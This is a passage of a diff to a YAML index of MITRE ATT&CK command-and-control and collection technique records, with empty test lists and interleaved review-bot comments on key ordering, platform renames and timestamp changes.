+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
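Review bot: the new Malleable-C2-U42 reference runs seven author names together with no separators ("Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj"); format it as "Navarrete, C., Sangvikar, D., Guan, A., Fu, Y., Jia, Y., Shibiraj, S." like the other entries. Also trim the space before "\n\n" in "a trusted entity. \n\n" so the description does not gain a trailing space. The added sentences cite exactly the two references added here, so the citations resolve.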
@@ -38378,7 +38870,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38438,7 +38929,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38470,7 +38960,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -38496,8 +38986,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38564,7 +39052,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -38662,7 +39149,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -38755,7 +39241,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -38779,7 +39264,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -38802,8 +39287,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -38828,7 +39311,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -38848,8 +39331,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -38903,7 +39384,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -38928,7 +39408,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38954,8 +39434,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -39009,7 +39487,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -39085,7 +39562,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -39142,7 +39618,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39236,7 +39711,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39315,7 +39789,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39354,7 +39827,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39369,30 +39842,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
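Review bot: T1602 keeps x_mitre_attack_spec_version: 2.1.0 (unchanged context above) and only loses spec_version, while the other 2.1.0 objects in this patch have x_mitre_attack_spec_version deleted outright; pick one treatment for 2.1.0 objects. The T1213.002 rewrite that starts here is, like T1001.003, a full key reorder, so the one substantive description change (the Unsecured Credentials link) is buried in the next hunk.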
@@ -39401,13 +39854,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39421,20 +39878,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
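Review bot: x_mitre_permissions_required: User is dropped from T1213.002 with no replacement field, and the platform list changes from Office 365 to Office Suite. Both are schema-level changes: code that reads permissions_required must tolerate its absence, and any platform filter on "Office 365" stops matching this technique, so platform-based indexes have to be regenerated with this change. Adding the Cloud Service: Cloud Service Metadata data source is consistent with the Office Suite platform.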
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39477,7 +39951,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39502,7 +39975,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39522,22 +39995,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39554,11 +40029,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
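Review bot: T1114 loses both Office 365 and Google Workspace and gains only Office Suite, so there is no longer a Google Workspace platform on this technique and any index or filter scoped to Google Workspace silently drops T1114. If Office Suite is meant to cover both, state that mapping in the commit message and rebuild the Google Workspace-scoped indexes from the new platform name rather than leaving stale entries in place.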
@@ -39574,37 +40048,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -39616,75 +40081,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
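Review bot: Almost all of this hunk is key reordering rather than a content change; the only substantive edits to T1074.001 are `modified`, the Prevailion reference URL being swapped for a web.archive.org snapshot, `x_mitre_attack_spec_version: 2.1.0` becoming `3.2.0`, and the STIX `spec_version: '2.1'` line being dropped. If this index is generated, emit keys in a fixed order (sorted, or the upstream STIX order) so future diffs show only real changes; and since `spec_version` disappears from every object touched in this diff, say in the PR description that the per-object STIX spec_version is no longer carried, because a consumer that validates these objects as STIX 2.1 will now find that field missing.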
@@ -39711,7 +40194,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
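Review bot: `modified` for T1114.001 moves backwards, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-24T17:59:20.983Z'`; the same regression appears further down for T1005, T1560.002, T1602.002, T1185, T1557.001 and T1125, and most of the removed values share a `T14:00:00.188Z` time of day, which looks like a bulk release stamp rather than an edit time. A decreasing `modified` is legal YAML but breaks any downstream sync that selects objects whose `modified` is newer than the last import, so please confirm these values come from the upstream ATT&CK data as-is and call the regression out in the PR description.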
@@ -39735,13 +40218,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -39762,6 +40243,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -39785,8 +40267,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -39811,7 +40295,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -39878,12 +40361,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39917,10 +40399,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -39931,13 +40415,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
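Review bot: The platform change for T1530 drops `Google Workspace` and `Office 365` and adds `Office Suite`, so any per-platform index, filter or detection-coverage mapping keyed on the old names will now return nothing for this technique. Regenerate the derived platform indexes in the same change and add a one-line mapping note (old names -> `Office Suite`) so consumers of those indexes know the rename is intentional; the added `'Cloud Service: Cloud Service Metadata'` data source is a reasonable companion to the existing `'Cloud Storage: Cloud Storage Access'` for the SaaS side.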
@@ -39978,37 +40463,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
